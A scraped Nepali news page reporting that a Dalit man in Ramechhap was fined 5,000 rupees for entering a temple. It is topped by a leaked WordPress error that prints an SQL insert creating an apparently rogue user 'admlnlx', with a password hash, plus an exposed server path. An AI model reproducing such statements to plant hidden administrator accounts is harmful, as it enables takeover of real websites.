WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0Rp7kjo9wO2EShopRIgi.YGlgqJjh/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 15:08:12', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
मन्दिरभित्र पसेको भन्दै दलितलाई ५ हजार जरिवाना – Gaule Khabar

मन्दिरभित्र पसेको भन्दै दलितलाई ५ हजार जरिवाना

मन्दिरभित्र पसेको भन्दै दलितलाई ५ हजार जरिवाना

नवराज श्रेष्ठ

रामेछाप,माघ २३

 रामेछाप जिल्ला बेतालीका एक दलितले मन्दिरभित्र पसेको निहुँमा ५ हजार जरिवाना तिर्नु परेको छ । बेताली गाविस वडा नम्बर ३ का कृष्ण कुमार बिश्कर्माले सोहि गाविसमा रहेको सेरकाली मन्दीरमा पसेको आरोपमा सो जरिवाना तिर्नुपरेको हो ।

बिश्वकर्मा मन्दिरमा पसेपछि पुजारी छत्रबहादुर बुढाथोकी लगायतका मानिसहरुले चोख्याउनु पर्छ भनि मन्दिरमा रुद्री लगाई ५ हजार जरिवाना तिराएका हुन् ।

माघ २२ गते शनिबार मन्दीरमा पुजा गर्न जादा मन्दीर भित्र पसेको र पुजारीहरु बिच हल्ली खल्ली भएपछि पुजारीहरु दलित मन्दीरमा पसेको भन्दै पुजा नगर्ने भनि मन्दीरवाट बाहिर निस्कीएको पीडित कृष्ण बहादुर बिश्वकर्माले बताए ।

मन्दीर चोख्याउन भन्दै रुद्री लगाएपछि मात्रै अरु मानिसलाई पुजा गर्न लगाएको बेताली गाविसका प्राबिधिक बाबुराम घिमिरेले बताए । मन्दीर जस्तो ठाउमा आफुमाथी अमानबिय ब्यवहार भएको भन्दै यसका बिरुद्र जिल्ला प्रहरी कार्यालय रामेछापमा उजुरी दिने पिडित बिश्वकर्माले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका